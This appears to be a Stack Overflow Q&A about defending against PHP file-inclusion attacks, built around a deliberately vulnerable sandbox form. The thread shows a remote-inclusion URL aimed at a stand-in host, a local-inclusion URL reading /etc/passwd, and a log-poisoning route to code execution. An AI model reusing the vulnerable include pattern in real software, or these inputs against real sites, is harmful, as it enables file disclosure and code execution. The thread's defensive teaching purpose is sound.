# Defending Exploits

Tags: php, security, exploit

I've setup a sandbox and trying to run exploits so I can better understand how to better defend against them.  When I run the following, the process is failing as it should and for the right reason.  But then I'm not sure because I can't find a lot of "how-to write a proper exploit".  Here is my code and following is the message on failure.  Any guidance would be great.

```
 //unform.php (unprotected form)
 <html>
 <head>
 <title>Try An Exploit</title>
 <?php
 if (!empty($_GET)){
    foreach($_GET as $key=>$value){
    ${$key} = $value;
    }
}

 //no sanitizer here.
 echo $key;
 include($value);
 ?>
 </head>
 <body>
 <h1>This Is Bad</h1>

 <form action="#" method="get">
<select name="COLOR">
       <option value="red">red</option>
       <option value="blue">blue</option>
    </select>
<input type="submit" value="Kick Me" />
 </form>
 </body>
```

Exploit script, simple stuff:

```
 exploit.php
 <?php
   $somevar = "This is just a string";
   echo $somevar;
 ?>
```

Bad guy would hard code the following in their browser address bar:

```
 http://www.sandbox.com/path/to/unform.php?COLOR=http://www.remoteserv.com/exploit.php
```

Output to browser when trying to load the address:

```
 Warning: include() [function.include]: http:// wrapper is disabled in the server configuration by allow_url_include=0
```

So is that it?  Or are there other technique I should be looking out for?
Thanks

Comment: What are you trying to do? If you want to write a script with security holes, that's very easy to do even if you aren't actively trying to do so. If your question is "are there other exploits in PHP" then the question is way too broad.

Comment: There is only one technic. Validate *ALL* inputs, don't trust any variable, because you never know where the attack will be coming from.

Comment: Okay but is that all I need to be looking for?  Have I prevented 50% of the exploits?  What are the others (if any)?

Comment: Right, having no experience cracking server, I'm looking for the most common exploits and how to shut them down.  Sanitizers are one approach, not allowing HTTP includes are another, is that the majority of techniques?

Comment: `http://www.sandbox.com/path/to/unform.php?COLOR=/etc/passwd` ... that one should work fine still (unless you have an `open_basedir` restriction set).

Comment: If you `include` *anything* coming from a user (read: potential attacker), especially without proper sanitization, you should not be programming. The most common exploits on websites are [XSS](http://en.wikipedia.org/wiki/Cross-site_scripting), [SQL injection](http://en.wikipedia.org/wiki/SQL_injection) and [CSRF](http://en.wikipedia.org/wiki/Cross-site_scripting).

Comment: This is a rather broad question - entire books have been written about web application security. You might get more detailed answers over at [Security](http://security.stackexchange.com/), or from books like Michal Zalewski's *The Tangled Web*.

Comment: Thanks agreed, but I'm trying to write and exploit so I can better understand what going on under the hood. I'll check XSS.

Answer (score 3, accepted):

It looks like the exploit in question is execution of arbitrary script. The script is not vulnerable to arbitrary execution of *remote* scripts, on account of some php.ini settings - but it is vulnerable to arbitrary execution of local scripts.

## Arbitrary Execution of Remote Scripts

By default the `allow_url_include` php.ini directive is set to `0` - preventing you from including remote files, like so:

```
include("http://www.remoteserv.com/exploit.php");
```

... or equally like so:

```
$myVar = "http://www.remoteserv.com/exploit.php";
include($myVar);
```

See [Runtime Configurations - Filesystem and Streams Configuration Options](http://php.net/manual/en/filesystem.configuration.php) and [Using remote scripts](http://php.net/manual/en/features.remote-files.php) on php.net for more information.

Technically, you're still vulnerable to attack in that the user can provide input that results in an error - realistically you should sanitize that input - but you're not vulnerable to asbitrary execution of remote scripts.

## Arbitrary Execution of Local Scripts

But the php.ini directives are not protecting your from local script execution. An attacker could use a URL like...

```
http://www.sandbox.com/path/to/unform.php?wtv=/tmp/SomeFile.php
```

... and that file will be included. It might be a non-PHP file (resulting in an error) or it might be a file which the attacker has place on your server - either by means of a file upload or by means of a [Shared Hosting Environment](http://en.wikipedia.org/wiki/Shared_web_hosting_service).

For further reading, [chapter 5 of the book Essential PHP Security](http://phpsecurity.org/contents#ch05) is devoted entirely to the security of [include](http://php.net/manual/en/function.include.php).

## Other

You are **also** vulnerable to [XSS](http://en.wikipedia.org/wiki/Cross-site_scripting):

```
echo $key;
```

When outputting `$key` - which is input - you should encode the output in some way, probably using [`htmlentities(...)`](http://php.net/manual/en/function.htmlentities.php).

You are also manipulating variables using use input:

```
${$key} = $value;
```

...which is a bad idea.

Comment: Thanks for the answer, XSS looks like the next stop.

Comment: Your answer is only geared towards Remote-File-Inclusion; there is still the vulnerability of Local-File-Inclusion. Local files can be read-in and outputted with `include()`; To execute arbitrary code, an attacker could visit `http://site.com/<?php exec('...');` and then call `?COLOR=/path/to/error_log` and the PHP will be executed. Local-File-Inclusion vulnerabilities can be far more dangerous than XSS and shouldn't be ignored =P

Comment: @newfurniturey - That's an excellent point. Shall I edit my answer to that effect, or would you prefer to post it as a separate answer?

Comment: awesome. this is what I was hoping for, a learning path so I could get up to speed.  I'll pick up a book, but wanted to get the 10000 foot view first. Thanks all.

Comment: @RichardJPLeGuen No problem with you answering; One post to cover all the topics would be better than a handful covering one each =]